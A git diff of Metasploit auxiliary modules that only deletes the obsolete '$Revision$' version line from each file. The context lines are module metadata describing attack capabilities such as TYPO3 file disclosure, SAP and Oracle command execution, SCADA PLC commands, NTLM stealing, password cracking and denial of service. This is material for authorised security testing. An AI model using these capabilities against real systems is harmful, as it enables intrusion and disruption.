@@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'TYPO3 sa-2010-020 Remote File Disclosure', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes. Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0. diff --git a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb index 68f30cdb1c..4630d40894 100644 --- a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb +++ b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb @@ -15,7 +15,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'TYPO3 Winstaller default Encryption Keys', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits known default encryption keys found in the TYPO3 Winstaller. This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index 198f8b2150..9cb5390922 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb +++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '40210' ], diff --git a/modules/auxiliary/admin/motorola/wr850g_cred.rb b/modules/auxiliary/admin/motorola/wr850g_cred.rb index f9de596ebc..968ada625b 100644 --- a/modules/auxiliary/admin/motorola/wr850g_cred.rb +++ b/modules/auxiliary/admin/motorola/wr850g_cred.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1550' ], [ 'OSVDB', '10232' ], diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index a9bda6ebd7..5975cb86f4 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'MSB', 'MS08-059' ], diff --git a/modules/auxiliary/admin/mssql/mssql_exec.rb b/modules/auxiliary/admin/mssql/mssql_exec.rb index 4e7aec282f..b70975a410 100644 --- a/modules/auxiliary/admin/mssql/mssql_exec.rb +++ b/modules/auxiliary/admin/mssql/mssql_exec.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'tebo ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'], diff --git a/modules/auxiliary/admin/mssql/mssql_idf.rb b/modules/auxiliary/admin/mssql/mssql_idf.rb index 087981bcc2..7bf3f9f42e 100644 --- a/modules/auxiliary/admin/mssql/mssql_idf.rb +++ b/modules/auxiliary/admin/mssql/mssql_idf.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Robin Wood ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.digininja.org/metasploit/mssql_idf.php' ], diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index 72a7cf7c7f..5ed7e39f32 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'tebo ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.attackresearch.com' ], diff --git a/modules/auxiliary/admin/mysql/mysql_enum.rb b/modules/auxiliary/admin/mysql/mysql_enum.rb index 8ea749a4bd..62517dba8c 100644 --- a/modules/auxiliary/admin/mysql/mysql_enum.rb +++ b/modules/auxiliary/admin/mysql/mysql_enum.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Carlos Perez ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'https://cisecurity.org/benchmarks.html' ] diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 5125cd8a14..698af5acfe 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access', - 'Version' => '$Revision$', 'Description' => %q{ This module tests for directory traversal vulnerability in the UpdateAgent function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index 28927e7882..f50d28e88e 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Sh2kerr ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ], diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb index 9598de5e21..e5ebb671eb 100644 --- a/modules/auxiliary/admin/oracle/oracle_login.rb +++ b/modules/auxiliary/admin/oracle/oracle_login.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ], diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index 3852d03504..f3da70fafe 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'https://www.metasploit.com/users/mc' ], diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index 933e5e9c42..238ea058ae 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5448' ], diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index f106592913..52c28488c5 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1977' ], diff --git a/modules/auxiliary/admin/oracle/osb_execqr3.rb b/modules/auxiliary/admin/oracle/osb_execqr3.rb index 7ae37abfe4..7b986fc512 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr3.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr3.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0904' ], diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb index b37214bb37..2780857532 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'https://www.metasploit.com/users/mc' ], diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index 0ce84a4ef7..0a53dc67af 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'CG' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.argeniss.com/research/oraclesqlinj.zip' ], diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index 6fe1a92eb1..b46622dfb8 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'https://www.metasploit.com/users/mc' ], diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index dfe404bda0..df28ef1bca 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['MC'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DisclosureDate' => 'Feb 1 2009' )) diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index dc889d58a1..d9e489ceed 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '368' ], diff --git a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb index e57a7b4ffd..d70b39b62b 100644 --- a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb +++ b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console OSExecute', - 'Version' => '$Revision$', 'Description' => %q{ This module allows execution of operating system commands through the SAP Management Console SOAP Interface. A valid username and password must be diff --git a/modules/auxiliary/admin/scada/igss_exec_17.rb b/modules/auxiliary/admin/scada/igss_exec_17.rb index da1752b1bd..49dd120ba0 100644 --- a/modules/auxiliary/admin/scada/igss_exec_17.rb +++ b/modules/auxiliary/admin/scada/igss_exec_17.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1566'], diff --git a/modules/auxiliary/admin/scada/modicon_command.rb b/modules/auxiliary/admin/scada/modicon_command.rb index 5729b6ed15..6881b15080 100644 --- a/modules/auxiliary/admin/scada/modicon_command.rb +++ b/modules/auxiliary/admin/scada/modicon_command.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ] ], - 'Version' => '$Revision$', 'DisclosureDate' => 'Apr 5 2012' )) register_options( diff --git a/modules/auxiliary/admin/scada/modicon_password_recovery.rb b/modules/auxiliary/admin/scada/modicon_password_recovery.rb index 6a911e0df3..4492b48c01 100644 --- a/modules/auxiliary/admin/scada/modicon_password_recovery.rb +++ b/modules/auxiliary/admin/scada/modicon_password_recovery.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ] ], - 'Version' => '$Revision$', 'DisclosureDate'=> 'Jan 19 2012' )) diff --git a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb index ec03727174..dbbda3a618 100644 --- a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb +++ b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ] ], - 'Version' => '$Revision$', 'DisclosureDate' => 'Apr 5 2012' )) diff --git a/modules/auxiliary/admin/scada/multi_cip_command.rb b/modules/auxiliary/admin/scada/multi_cip_command.rb index 7b96f8c243..61b1ea6725 100644 --- a/modules/auxiliary/admin/scada/multi_cip_command.rb +++ b/modules/auxiliary/admin/scada/multi_cip_command.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ] ], - 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 19 2012')) register_options( diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index ca3f47ff6a..99e3958e02 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'toto' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-6507' ], diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index a9f6ca1cb4..2f2ede0511 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Scanner Check File/Directory Utility', - 'Version' => '$Revision$', 'Description' => %Q{ This module is useful when checking an entire network of SMB hosts for the presence of a known file or directory. diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb index dfab1d09ca..0fdcc1bcad 100644 --- a/modules/auxiliary/admin/smb/list_directory.rb +++ b/modules/auxiliary/admin/smb/list_directory.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Directory Listing Utility', - 'Version' => '$Revision$', 'Description' => %Q{ This module lists the directory of a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index fad1557741..51e573a53f 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Samba Symlink Directory Traversal', - 'Version' => '$Revision$', 'Description' => %Q{ This module exploits a directory traversal flaw in the Samba CIFS server. To exploit this flaw, a writeable share must be specified. diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index 2a4a19c0ad..05c59a80f2 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB File Upload Utility', - 'Version' => '$Revision$', 'Description' => %Q{ This module uploads a file to a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 2890c10ef0..c0b7da036c 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary 'jduck' # Ported to MSF v3 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0027'], diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index bb8b05a4de..2b7c008f4b 100644 --- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb +++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Matteo Cantoni ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '30172'], diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb index 5c76847607..c23633df4f 100644 --- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb +++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'theLightCosine' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['BID', '17978'], diff --git a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb index 7e9a4f1d92..e715f1abfc 100644 --- a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb +++ b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '66842'], diff --git a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb index 6bed0aed42..26c99bba1a 100644 --- a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb +++ b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '66842'], diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb index 13e657574c..174339dc1a 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '66842'], diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb index 7b279e8ae6..a893d75ae3 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '66842'], diff --git a/modules/auxiliary/admin/webmin/file_disclosure.rb b/modules/auxiliary/admin/webmin/file_disclosure.rb index 059cfd1f12..4bcbf89d22 100644 --- a/modules/auxiliary/admin/webmin/file_disclosure.rb +++ b/modules/auxiliary/admin/webmin/file_disclosure.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Matteo Cantoni ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '26772'], diff --git a/modules/auxiliary/admin/zend/java_bridge.rb b/modules/auxiliary/admin/zend/java_bridge.rb index 7aaf0fcf6c..920c4d1f88 100644 --- a/modules/auxiliary/admin/zend/java_bridge.rb +++ b/modules/auxiliary/admin/zend/java_bridge.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'ikki', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '71420'], diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb index 3e449a483e..1f172392f9 100644 --- a/modules/auxiliary/analyze/jtr_aix.rb +++ b/modules/auxiliary/analyze/jtr_aix.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper AIX Password Cracker', - 'Version' => '$Revision$', 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired from passwd files on AIX systems. diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb index 142d9989db..e0395f84d9 100644 --- a/modules/auxiliary/analyze/jtr_crack_fast.rb +++ b/modules/auxiliary/analyze/jtr_crack_fast.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper Password Cracker (Fast Mode)', - 'Version' => '$Revision$', 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb index 3c05e61f2d..6f724bcd85 100644 --- a/modules/auxiliary/analyze/jtr_linux.rb +++ b/modules/auxiliary/analyze/jtr_linux.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper Linux Password Cracker', - 'Version' => '$Revision$', 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack diff --git a/modules/auxiliary/analyze/jtr_mssql_fast.rb b/modules/auxiliary/analyze/jtr_mssql_fast.rb index 8ccda07780..233b4efe17 100644 --- a/modules/auxiliary/analyze/jtr_mssql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mssql_fast.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper MS SQL Password Cracker (Fast Mode)', - 'Version' => "$Revision$", 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb index ba90e3ad88..ceba750a5b 100644 --- a/modules/auxiliary/analyze/jtr_mysql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper MySQL Password Cracker (Fast Mode)', - 'Version' => '$Revision$', 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully diff --git a/modules/auxiliary/analyze/jtr_oracle_fast.rb b/modules/auxiliary/analyze/jtr_oracle_fast.rb index f9d470eec1..683dd9a62d 100644 --- a/modules/auxiliary/analyze/jtr_oracle_fast.rb +++ b/modules/auxiliary/analyze/jtr_oracle_fast.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'John the Ripper Oracle Password Cracker (Fast Mode)', - 'Version' => "$Revision$", 'Description' => %Q{ This module uses John the Ripper to identify weak passwords that have been acquired from the oracle_hashdump module. Passwords that have been successfully diff --git a/modules/auxiliary/analyze/jtr_unshadow.rb b/modules/auxiliary/analyze/jtr_unshadow.rb index f1aab2136d..f3f317eadf 100644 --- a/modules/auxiliary/analyze/jtr_unshadow.rb +++ b/modules/auxiliary/analyze/jtr_unshadow.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Unix Unshadow Utility', - 'Version' => "$Revision$", 'Description' => %Q{ This module takes a passwd and shadow file and 'unshadows' them and saves them as linux.hashes loot. diff --git a/modules/auxiliary/analyze/postgres_md5_crack.rb b/modules/auxiliary/analyze/postgres_md5_crack.rb index a8264c9bde..2e6d33f74f 100644 --- a/modules/auxiliary/analyze/postgres_md5_crack.rb +++ b/modules/auxiliary/analyze/postgres_md5_crack.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Postgres SQL md5 Password Cracker', - 'Version' => '$Revision$', 'Description' => %Q{ This module attempts to crack Postgres SQL md5 password hashes. It creates hashes based on information saved in the MSF Database diff --git a/modules/auxiliary/bnat/bnat_router.rb b/modules/auxiliary/bnat/bnat_router.rb index 49495bf1fd..c1ced41d73 100644 --- a/modules/auxiliary/bnat/bnat_router.rb +++ b/modules/auxiliary/bnat/bnat_router.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'BNAT Router', - 'Version' => '$Revision$', 'Description' => %q{ This module will properly route BNAT traffic and allow for connections to be established to machines on ports which might not otherwise be accessible.}, diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index eaaff4e2a6..75ab0fb609 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'BNAT Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module is a scanner which can detect Broken NAT (network address translation) implementations, which could result in a inability to reach ports on remote diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index 6037570874..34b17c2937 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary engineering. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://spl0it.org/' ], diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 0a109ae700..5cd0c7a239 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Metasploit Web Crawler', - 'Version' => '$Revision$', 'Description' => 'This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.', 'Author' => 'et', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index 2441c65fb0..0cd7018408 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Patrick Webster ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '1154'], diff --git a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb index d0a124e66e..2c9f2a6e3a 100644 --- a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb +++ b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'theLightCosine' # msf module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2156' ], diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index edb57d6c1d..7773413212 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.html' ], diff --git a/modules/auxiliary/dos/hp/data_protector_rds.rb b/modules/auxiliary/dos/hp/data_protector_rds.rb index 066c66a0b1..1bfed3692f 100644 --- a/modules/auxiliary/dos/hp/data_protector_rds.rb +++ b/modules/auxiliary/dos/hp/data_protector_rds.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary 'sinn3r', #msf ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0514' ], diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index 2230e7311b..52706a9880 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -27,7 +27,6 @@ class Metasploit3 < 